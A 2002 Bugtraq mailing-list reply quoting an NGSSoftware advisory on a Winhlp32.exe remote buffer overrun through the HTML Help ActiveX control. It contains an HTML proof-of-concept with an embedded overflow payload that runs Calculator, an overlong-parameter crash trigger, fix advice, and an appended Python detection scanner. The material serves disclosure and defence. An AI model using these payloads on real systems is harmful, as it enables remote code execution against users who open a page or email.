Re: Winhelp32 Remote Buffer Overrun

From: Jelmer (jelmer@kuperus.xs4all.nl)
Date: 08/02/02


From: "Jelmer" <jelmer@kuperus.xs4all.nl>
To: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>, <bugtraq@securityfocus.com>, <ntbugtraq@listser.ntbugtraq.com>
Date: Fri, 2 Aug 2002 02:19:14 +0200

I just installed servicepack 3 and the following code still crashed my
IE6 with a memory could not be referenced error.

<OBJECT ID=hhctrl TYPE="application/x-oleobject"
        CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
    <PARAM name="Command" value="Shortcut">
    <PARAM name="Button" value="Bitmap:shortcut">
    <PARAM name="Item1" value=",,">
    <PARAM name="Item2" value="273,1,1">
    <PARAM name="codebase" value="">
    <PARAM name="Font" value=" A VERY VERY LONG STRING ">
</OBJECT>

I have been told this means it is most likely exploitable. I am not into
buffer overflows myself though, maybe someone can confirm this. Anyways I
notified Microsoft of this several months ago. The day after I notified them
someone pointed me to the NGSSoftware advisory *sob*, and I notified
Microsoft that this was probably the same issue; last I heard from them they
were looking into whether this was indeed the case. It's been several months
and as far as I know they are still looking.

--
 jelmer

----- Original Message -----
From: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>
To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com>
Sent: Friday, August 02, 2002 3:59 AM
Subject: Winhelp32 Remote Buffer Overrun

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> NGSSoftware Insight Security Research Advisory
>
> Name: Winhlp32.exe Remote BufferOverrun
> Systems Affected: Win2K Platform
> Severity: Critical
> Category: Remote Buffer Overrun
> Vendor URL: http://www.mircosoft.com
> Author: Mark Litchfield (mark@ngssoftware.com)
> Date: 1st August 2002
> Advisory number: #NISR01082002
>
> Description
> ***********
>
> Many of the features available in HTML Help are implemented through
> the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
> control is used to provide navigation features (such as a table of
> contents), to display secondary windows and pop-up definitions, and
> to provide other features. The HTML Help ActiveX control can be used
> from topics in a compiled Help system as well as from HTML pages
> displayed in a Web browser. The functionality provided by the HTML
> Help ActiveX control will run in the HTML Help Viewer or in any
> browser that supports ActiveX technology, such as Internet Explorer
> (version 3.01 or later). Some features, as with the WinHlp Command,
> provided by the HTML Help ActiveX control are meant to be available
> only when it is used from a compiled HTML Help file (.chm) that is
> displayed by using the HTML Help Viewer.
>
> Details
> *******
>
> Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
> parameter within WinHlp Command; the item parameter is used to
> specify the file path of the WinHelp (.hlp) file in which the WinHelp
> topic is stored, and the window name of the target window. Using
> this overrun, an attacker can successfully execute arbitrary code on
> a remote system by either encouraging the victim to visit a
> particular web page, whereby code would execute automatically, or by
> including the exploit within the source of an email. In regards to
> email, execution would automatically occur when the mail appears in
> the preview pane and ActiveX objects are allowed (this is allowed by
> default; the Internet Security Settings would have to be set as HIGH
> to prevent execution of this vulnerability). Any exploit would
> execute in the context of the logged on user.
>
> Visual POC Exploit
> ******************
>
> This POC will simply display Calculator. Please note that this was
> written on a Win2k PC with SP2 installed. I have not tested it on
> anything else.
>
> <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
> codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
> type=application/x-oleobject width=0><PARAM NAME="Width"
> VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
> VALUE="WinHelp"><PARAM NAME="Item1"
> VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
> PPPQQQQRRRRSSSSTTTAAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM
> NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
> <SCRIPT>winhelp.HHClick()</SCRIPT>
>
> Fix Information
> ***************
>
> NGSSoftware alerted Microsoft to these problems on the 6th March
> 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
> as the fix has been built into this service pack found at
> http://www.microsoft.com
> An alternative to these patches would be to ensure the security
> settings found in the Internet Options are set to high. Despite the
> Medium setting, stating that unsigned ActiveX controls will not be
> downloaded, Kylie will still execute Calc.exe. Another alternative
> would be to remove winhlp32.exe if it is not required within your
> environment.
> A check for these issues has been added to Typhon II, of which more
> information is available from the
> NGSSoftware website, http://www.ngssoftware.com.
>
> Further Information
> *******************
>
> For further information about the scope and effects of buffer
> overflows, please see
>
> http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
> http://www.ngssoftware.com/papers/ntbufferoverflow.html
> http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
> http://www.ngssoftware.com/papers/unicodebo.pdf
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
> a+qSkYWrz7uspZcqqRTc2r0C
> =2PKN
> -----END PGP SIGNATURE-----
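Both the crash trigger in Jelmer's reply (an overlong Font value) and the advisory's PoC (the WinHelp command with an oversized Item1) instantiate the same HHCtrl control by CLSID. The following is an added content-scanning example written for this page, not code from either post: it parses HTML (a web page or a mail body) with Python's standard HTMLParser, finds OBJECT elements bound to that CLSID, and flags the WinHelp command and any overlong Item1/Item2/Font parameter. The 64-byte threshold and the constructed sample are assumptions.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), as quoted in the advisory.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed threshold: legitimate Item1/Item2/Font values are a few dozen bytes at most.
MAX_PARAM_LEN = 64


class HHCtrlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.current = None   # OBJECT being parsed, if it is an HHCtrl instance
        self.objects = []     # completed HHCtrl OBJECTs with their PARAMs

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        if tag == "object" and HHCTRL_CLSID in a.get("classid", "").lower():
            self.current = {"id": a.get("id", ""), "params": {}}
        elif tag == "param" and self.current is not None:
            self.current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self.current is not None:
            self.objects.append(self.current)
            self.current = None


def scan_html(html):
    """Return alert strings for suspicious HHCtrl instantiations found in html."""
    parser = HHCtrlScanner()
    parser.feed(html)
    parser.close()
    alerts = []
    for obj in parser.objects:
        params = obj["params"]
        command = params.get("command", "").lower()
        # The advisory notes WinHelp is meant only for compiled .chm files, so its
        # appearance in a web page or mail body is worth flagging on its own.
        if command == "winhelp":
            alerts.append(f"object {obj['id']!r}: WinHelp command in web/mail content")
        for name in ("item1", "item2", "font"):
            value = params.get(name, "")
            if len(value) > MAX_PARAM_LEN:
                alerts.append(f"object {obj['id']!r}: {name} is {len(value)} bytes (command={command!r})")
    return alerts


# Constructed sample mirroring the crash trigger in the mail above: an overlong Font value.
SAMPLE_OVERLONG = (f'<OBJECT ID=hhctrl TYPE="application/x-oleobject" CLASSID="clsid:{HHCTRL_CLSID}">'
                   '<PARAM name="Command" value="Shortcut"><PARAM name="Item1" value=",,">'
                   '<PARAM name="Font" value="' + "A" * 300 + '"></OBJECT>')
```

Running `scan_html(SAMPLE_OVERLONG)` yields one alert naming the 300-byte Font parameter; a Shortcut object with short values yields none.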


